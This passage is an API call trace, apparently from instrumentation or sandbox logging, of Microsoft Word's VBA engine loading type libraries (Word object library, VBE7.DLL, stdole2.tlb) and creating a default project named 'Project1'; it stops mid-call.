[0017.034] wcscpy_s (in: _Destination=0xbcedba8, _SizeInWords=0x8e, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0017.034] wcscpy_s (in: _Destination=0xbcedbae, _SizeInWords=0x8b, _Source="{00020905-0000-0000-C000-000000000046}" | out: _Destination="{00020905-0000-0000-C000-000000000046}") returned 0x0 [0017.034] wcscpy_s (in: _Destination=0xbcedbfa, _SizeInWords=0x65, _Source="#8.7#0#" | out: _Destination="#8.7#0#") returned 0x0 [0017.034] wcscpy_s (in: _Destination=0xbcedc08, _SizeInWords=0x5e, _Source="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB" | out: _Destination="C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB") returned 0x0 [0017.035] wcscpy_s (in: _Destination=0xbcedc7e, _SizeInWords=0x23, _Source="Microsoft Word 16.0 Object Library" | out: _Destination="Microsoft Word 16.0 Object Library") returned 0x0 [0017.035] ITypeLib:LocalReleaseTLibAttr (This=0x72e0930) returned 0x0 [0017.035] wcscpy_s (in: _Destination=0x79d4d70, _SizeInWords=0x8e, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library" | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0017.035] ITypeLib:RemoteGetDocumentation (in: This=0x72e0930, index=-1, refPtrFlags=0x286918, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x4 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x4) returned 0x0 [0017.035] SysStringLen (param_1="Word") returned 0x4 [0017.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0017.035] SysStringLen (param_1="Word") returned 0x4 [0017.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x2dce158, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0017.035] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Word") returned 0x106bb5 [0017.035] strcpy_s (in: _Dst=0x286710, _DstSize=0x5, _Src="Word" | out: _Dst="Word") returned 0x0 [0017.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286710, cbMultiByte=5, lpWideCharStr=0x286560, cchWideChar=5 | out: lpWideCharStr="Word") returned 5 [0017.035] wcsncpy_s (in: _Destination=0x286510, _SizeInWords=0x108, _Source="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _MaxCount=0x106 | out: _Destination="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0x0 [0017.035] CharLowerBuffW (in: lpsz="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", cchLength=0x8d | out: lpsz="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library") returned 0x8d [0017.035] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x11c) returned 0x79fb1a0 [0017.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", cchWideChar=142, lpMultiByteStr=0x79fb1a0, cbMultiByte=284, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{00020905-0000-0000-c000-000000000046}#8.7#0#c:\\program files\\microsoft office\\root\\office16\\msword.olb#microsoft word 16.0 object library", lpUsedDefaultChar=0x0) returned 142 [0017.035] IMalloc:Free (This=0x7fefe9e5380, pv=0x79fb1a0) [0017.035] _wcsicmp (_String1="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library", _String2="*\\G{00020905-0000-0000-C000-000000000046}#8.7#0#C:\\Program Files\\Microsoft Office\\Root\\Office16\\MSWORD.OLB#Microsoft Word 16.0 Object Library") returned 0 [0017.035] wcsncpy_s (in: _Destination=0x286510, _SizeInWords=0x108, _Source="*\\Z035c2b45a3", _MaxCount=0x106 | out: _Destination="*\\Z035c2b45a3") returned 0x0 [0017.035] CharLowerBuffW (in: lpsz="*\\Z035c2b45a3", cchLength=0xd | out: lpsz="*\\z035c2b45a3") returned 0xd [0017.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z035c2b45a3", cchWideChar=14, lpMultiByteStr=0x286440, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z035c2b45a3", lpUsedDefaultChar=0x0) returned 14 [0017.035] _wcsicmp (_String1="*\\Z035c2b45a3", _String2="*\\Z035c2b45a3") returned 0 [0017.035] IUnknown:AddRef (This=0x72e0930) returned 0x5 [0017.035] IUnknown:QueryInterface (in: This=0x72e0930, riid=0x7fef10364b8*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x286938 | out: ppvObject=0x286938*=0x0) returned 0x80004002 [0017.035] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Word", cchWideChar=5, lpMultiByteStr=0x286900, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Word", lpUsedDefaultChar=0x0) returned 5 [0017.035] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Word") returned 0x106bb5 [0017.035] IUnknown:Release (This=0x72e0930) returned 0x4 [0017.035] IUnknown:AddRef (This=0x788e200) returned 0x3 [0017.035] ITypeLib:RemoteGetDocumentation (in: This=0x788e200, index=-1, refPtrFlags=0x286a18, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0017.035] IUnknown:QueryInterface (in: This=0x788e200, riid=0x7fef1036290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x286808 | out: ppvObject=0x286808*=0x0) returned 0x80004002 [0017.035] ITypeLib:RemoteGetLibAttr (in: This=0x788e200, ppTLibAttr=0x286800, pDummy=0x10 | out: ppTLibAttr=0x286800, pDummy=0x10) returned 0x0 [0017.035] ITypeLib:RemoteGetDocumentation (in: This=0x788e200, index=-1, refPtrFlags=0x0, pbstrName=0x2867f8, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x8a00b1ca534b | out: pbstrName=0x2867f8*="Visual Basic For Applications", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x8a00b1ca534b) returned 0x0 [0017.035] StringFromGUID2 (in: rguid=0x7831c80*(Data1=0x204ef, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x286820, cchMax=39 | out: lpsz="{000204EF-0000-0000-C000-000000000046}") returned 39 [0017.035] _ultow_s (in: _Value=0x4, _Buffer=0x28676a, _BufferCount=0x10, _Radix=16 | out: _Buffer="4") returned 0x0 [0017.035] _ultow_s (in: _Value=0x2, _Buffer=0x28676e, _BufferCount=0xe, _Radix=16 | out: _Buffer="2") returned 0x0 [0017.035] _ultow_s (in: _Value=0x9, _Buffer=0x286772, _BufferCount=0xc, _Radix=16 | out: _Buffer="9") returned 0x0 [0017.035] wcscpy_s (in: _Destination=0xbcedba8, _SizeInWords=0x91, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0017.035] wcscpy_s (in: _Destination=0xbcedbae, _SizeInWords=0x8e, _Source="{000204EF-0000-0000-C000-000000000046}" | out: _Destination="{000204EF-0000-0000-C000-000000000046}") returned 0x0 [0017.035] wcscpy_s (in: _Destination=0xbcedbfa, _SizeInWords=0x68, _Source="#4.2#9#" | out: _Destination="#4.2#9#") returned 0x0 [0017.035] wcscpy_s (in: _Destination=0xbcedc08, _SizeInWords=0x61, _Source="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" | out: _Destination="C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL") returned 0x0 [0017.035] wcscpy_s (in: _Destination=0xbcedc8e, _SizeInWords=0x1e, _Source="Visual Basic For Applications" | out: _Destination="Visual Basic For Applications") returned 0x0 [0017.036] ITypeLib:LocalReleaseTLibAttr (This=0x788e200) returned 0x0 [0017.036] wcscpy_s (in: _Destination=0x79e3ac8, _SizeInWords=0x91, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications" | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0017.036] ITypeLib:RemoteGetDocumentation (in: This=0x788e200, index=-1, refPtrFlags=0x286918, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x3) returned 0x0 [0017.036] SysStringLen (param_1="VBA") returned 0x3 [0017.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0017.036] SysStringLen (param_1="VBA") returned 0x3 [0017.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x7832168, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0017.036] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA") returned 0x10e2f7 [0017.036] strcpy_s (in: _Dst=0x286710, _DstSize=0x4, _Src="VBA" | out: _Dst="VBA") returned 0x0 [0017.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286710, cbMultiByte=4, lpWideCharStr=0x286560, cchWideChar=4 | out: lpWideCharStr="VBA") returned 4 [0017.036] IUnknown:AddRef (This=0x72e0930) returned 0x5 [0017.036] ITypeLib:RemoteIsName (in: This=0x72e0930, szNameBuf="VBA", lHashVal=0x10e2f7, pfName=0x286630, pBstrLibName=0x286560 | out: pfName=0x286630*=0, pBstrLibName=0x286560) returned 0x0 [0017.036] IUnknown:Release (This=0x72e0930) returned 0x4 [0017.036] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xc) returned 0x7506f10 [0017.036] IMalloc:Free (This=0x7fefe9e5380, pv=0x778be70) [0017.036] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x778be70 [0017.036] IMalloc:Free (This=0x7fefe9e5380, pv=0x7506f10) [0017.036] wcsncpy_s (in: _Destination=0x286510, _SizeInWords=0x108, _Source="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _MaxCount=0x106 | out: _Destination="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0x0 [0017.036] CharLowerBuffW (in: lpsz="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", cchLength=0x90 | out: lpsz="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications") returned 0x90 [0017.036] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x122) returned 0x79fb1a0 [0017.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", cchWideChar=145, lpMultiByteStr=0x79fb1a0, cbMultiByte=290, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\g{000204ef-0000-0000-c000-000000000046}#4.2#9#c:\\program files\\common files\\microsoft shared\\vba\\vba7.1\\vbe7.dll#visual basic for applications", lpUsedDefaultChar=0x0) returned 145 [0017.036] IMalloc:Free (This=0x7fefe9e5380, pv=0x79fb1a0) [0017.036] _wcsicmp (_String1="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications", _String2="*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual Basic For Applications") returned 0 [0017.036] wcsncpy_s (in: _Destination=0x286510, _SizeInWords=0x108, _Source="*\\Z035c2b45a3", _MaxCount=0x106 | out: _Destination="*\\Z035c2b45a3") returned 0x0 [0017.036] CharLowerBuffW (in: lpsz="*\\Z035c2b45a3", cchLength=0xd | out: lpsz="*\\z035c2b45a3") returned 0xd [0017.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z035c2b45a3", cchWideChar=14, lpMultiByteStr=0x286440, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z035c2b45a3", lpUsedDefaultChar=0x0) returned 14 [0017.036] _wcsicmp (_String1="*\\Z035c2b45a3", _String2="*\\Z035c2b45a3") returned 0 [0017.036] IUnknown:AddRef (This=0x788e200) returned 0x4 [0017.036] IUnknown:QueryInterface (in: This=0x788e200, riid=0x7fef10364b8*(Data1=0xcacc1e8a, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x286938 | out: ppvObject=0x286938*=0x0) returned 0x80004002 [0017.036] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBA", cchWideChar=4, lpMultiByteStr=0x286900, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBA", lpUsedDefaultChar=0x0) returned 4 [0017.036] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA") returned 0x10e2f7 [0017.036] IUnknown:Release (This=0x788e200) returned 0x3 [0017.036] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0xbd0f0e0 [0017.036] IMalloc:GetSize (This=0x7fefe9e5380, pv=0xbd0f0e0) returned 0x0 [0017.036] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0xbd0f0d0 [0017.036] IMalloc:GetSize (This=0x7fefe9e5380, pv=0xbd0f0d0) returned 0x0 [0017.036] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x0) returned 0xbd0f0f0 [0017.036] qsort (in: _Base=0xbd0f0f0, _NumOfElements=0x0, _SizeOfElements=0x10, _PtFuncCompare=0x7fef0dfdb70 | out: _Base=0xbd0f0f0) [0017.036] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd0f0f0) [0017.036] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x18) returned 0x7506f10 [0017.036] IMalloc:Alloc (This=0x7fefe9e5380, cb=0xc) returned 0x797c860 [0017.036] IMalloc:GetSize (This=0x7fefe9e5380, pv=0x797c860) returned 0xc [0017.036] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win16") returned 0x107ec1 [0017.037] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win32") returned 0x107f07 [0017.037] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Win64") returned 0x107f78 [0017.037] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Mac") returned 0x10b2b3 [0017.037] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA6") returned 0x1023ad [0017.037] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VBA7") returned 0x1023ae [0017.037] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd0f0d0) [0017.037] IMalloc:Free (This=0x7fefe9e5380, pv=0xbd0f0e0) [0017.037] CoCreateGuid (in: pguid=0x286fe8 | out: pguid=0x286fe8*(Data1=0x896d46ec, Data2=0x8fb1, Data3=0x4a5a, Data4=([0]=0x8d, [1]=0x6c, [2]=0x28, [3]=0x67, [4]=0xd9, [5]=0xf, [6]=0x1b, [7]=0xc7))) returned 0x0 [0017.037] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x6b0) returned 0x7a77dd0 [0017.037] CoCreateGuid (in: pguid=0x79e19d8 | out: pguid=0x79e19d8*(Data1=0xeef90dff, Data2=0xddf0, Data3=0x4efd, Data4=([0]=0xba, [1]=0x98, [2]=0x41, [3]=0x57, [4]=0x27, [5]=0xf6, [6]=0x3d, [7]=0x7))) returned 0x0 [0017.037] strcpy_s (in: _Dst=0x79e1a38, _DstSize=0x1, _Src="" | out: _Dst="") returned 0x0 [0017.037] LoadStringA (in: hInstance=0x7fef0c70000, uID=0x32f3, lpBuffer=0xa39a1e8, cchBufferMax=128 | out: lpBuffer="Project") returned 0x7 [0017.037] wsprintfA (in: param_1=0xa39a1ef, param_2="%d" | out: param_1="1") returned 1 [0017.037] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0017.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7832168, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0017.037] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0017.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7832168, cbMultiByte=8, lpWideCharStr=0x7831c88, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0017.037] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=-1, lpMultiByteStr=0x287bd0, cbMultiByte=129, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0017.038] lstrlenA (lpString="Project") returned 7 [0017.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa39a1e8, cbMultiByte=-1, lpWideCharStr=0x287cc0, cchWideChar=9 | out: lpWideCharStr="Project1") returned 9 [0017.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=9, lpMultiByteStr=0x287bb0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0017.038] lstrcmpiA (lpString1="", lpString2="Project1") returned -1 [0017.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0017.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=-1, lpMultiByteStr=0x287ab0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0017.038] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project1") returned 0x10170a [0017.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=9, lpMultiByteStr=0x2879c0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0017.038] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project1") returned 0x10170a [0017.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=9, lpMultiByteStr=0x2879c0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0017.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=9, lpMultiByteStr=0x287880, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0017.038] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project1") returned 0x10170a [0017.038] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Project1") returned 0x10170a [0017.038] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x18) returned 0x7978a80 [0017.038] IMalloc:Free (This=0x7fefe9e5380, pv=0x778be70) [0017.038] IMalloc:Alloc (This=0x7fefe9e5380, cb=0x20) returned 0x778be70 [0017.038] IMalloc:Free (This=0x7fefe9e5380, pv=0x7978a80) [0017.038] wcsncpy_s (in: _Destination=0x287680, _SizeInWords=0x108, _Source="*\\Z035c2b45a3", _MaxCount=0x106 | out: _Destination="*\\Z035c2b45a3") returned 0x0 [0017.038] CharLowerBuffW (in: lpsz="*\\Z035c2b45a3", cchLength=0xd | out: lpsz="*\\z035c2b45a3") returned 0xd [0017.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z035c2b45a3", cchWideChar=14, lpMultiByteStr=0x2875b0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z035c2b45a3", lpUsedDefaultChar=0x0) returned 14 [0017.038] _wcsicmp (_String1="*\\Z035c2b45a3", _String2="*\\Z035c2b45a3") returned 0 [0017.038] strcpy_s (in: _Dst=0x79e1a48, _DstSize=0x9, _Src="Project1" | out: _Dst="Project1") returned 0x0 [0017.038] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0017.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7832168, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0017.038] SysStringByteLen (bstr="牐橯捥ㅴ") returned 0x8 [0017.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7832168, cbMultiByte=9, lpWideCharStr=0x7831c88, cchWideChar=9 | out: lpWideCharStr="Project1") returned 9 [0017.038] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project1", cchWideChar=-1, lpMultiByteStr=0x287ae0, cbMultiByte=128, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project1", lpUsedDefaultChar=0x0) returned 9 [0017.038] lstrlenA (lpString="Project1") returned 8 [0017.040] lstrlenA (lpString="C:\\Windows\\system32\\stdole2.tlb") returned 31 [0017.040] lstrcpyA (in: lpString1=0xa397f80, lpString2="C:\\Windows\\system32\\stdole2.tlb" | out: lpString1="C:\\Windows\\system32\\stdole2.tlb") returned="C:\\Windows\\system32\\stdole2.tlb" [0017.040] LoadTypeLib (in: szFile="C:\\Windows\\system32\\stdole2.tlb", pptlib=0x287b98*=0x0 | out: pptlib=0x287b98*=0x72df850) returned 0x0 [0017.040] LoadTypeLib (in: szFile="C:\\Windows\\system32\\stdole2.tlb", pptlib=0x287828*=0x0 | out: pptlib=0x287828*=0x72df850) returned 0x0 [0017.040] ITypeLib:RemoteGetDocumentation (in: This=0x72df850, index=-1, refPtrFlags=0x287848, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0017.040] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="stdole", cchWideChar=7, lpMultiByteStr=0x287730, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="stdole", lpUsedDefaultChar=0x0) returned 7 [0017.041] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="stdole") returned 0x106093 [0017.041] IUnknown:QueryInterface (in: This=0x72df850, riid=0x7fef1036290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x287708 | out: ppvObject=0x287708*=0x0) returned 0x80004002 [0017.041] GetLocalTime (in: lpSystemTime=0x2875b0 | out: lpSystemTime=0x2875b0*(wYear=0x7e2, wMonth=0x1, wDayOfWeek=0x3, wDay=0xa, wHour=0xa, wMinute=0x31, wSecond=0x7, wMilliseconds=0x1e1)) [0017.041] wcsncpy_s (in: _Destination=0x287260, _SizeInWords=0x108, _Source="*\\Z035c2b45a3", _MaxCount=0x106 | out: _Destination="*\\Z035c2b45a3") returned 0x0 [0017.041] CharLowerBuffW (in: lpsz="*\\Z035c2b45a3", cchLength=0xd | out: lpsz="*\\z035c2b45a3") returned 0xd [0017.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z035c2b45a3", cchWideChar=14, lpMultiByteStr=0x287190, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z035c2b45a3", lpUsedDefaultChar=0x0) returned 14 [0017.041] _wcsicmp (_String1="*\\Z035c2b45a3", _String2="*\\Z035c2b45a3") returned 0 [0017.041] IUnknown:QueryInterface (in: This=0x72df850, riid=0x7fef1036290*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x287638 | out: ppvObject=0x287638*=0x0) returned 0x80004002 [0017.041] ITypeLib:RemoteGetLibAttr (in: This=0x72df850, ppTLibAttr=0x287630, pDummy=0x10 | out: ppTLibAttr=0x287630, pDummy=0x10) returned 0x0 [0017.041] ITypeLib:RemoteGetDocumentation (in: This=0x72df850, index=-1, refPtrFlags=0x0, pbstrName=0x287628, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x287628*="OLE Automation", pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0017.041] StringFromGUID2 (in: rguid=0x7831c80*(Data1=0x20430, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), lpsz=0x287650, cchMax=39 | out: lpsz="{00020430-0000-0000-C000-000000000046}") returned 39 [0017.041] _ultow_s (in: _Value=0x2, _Buffer=0x28759a, _BufferCount=0x10, _Radix=16 | out: _Buffer="2") returned 0x0 [0017.041] _ultow_s (in: _Value=0x0, _Buffer=0x28759e, _BufferCount=0xe, _Radix=16 | out: _Buffer="0") returned 0x0 [0017.041] _ultow_s (in: _Value=0x0, _Buffer=0x2875a2, _BufferCount=0xc, _Radix=16 | out: _Buffer="0") returned 0x0 [0017.041] wcscpy_s (in: _Destination=0x7a57778, _SizeInWords=0x5f, _Source="*\\G" | out: _Destination="*\\G") returned 0x0 [0017.041] wcscpy_s (in: _Destination=0x7a5777e, _SizeInWords=0x5c, _Source="{00020430-0000-0000-C000-000000000046}" | out: _Destination="{00020430-0000-0000-C000-000000000046}") returned 0x0 [0017.041] wcscpy_s (in: _Destination=0x7a577ca, _SizeInWords=0x36, _Source="#2.0#0#" | out: _Destination="#2.0#0#") returned 0x0 [0017.041] wcscpy_s (in: _Destination=0x7a577d8, _SizeInWords=0x2f, _Source="C:\\Windows\\system32\\stdole2.tlb" | out: 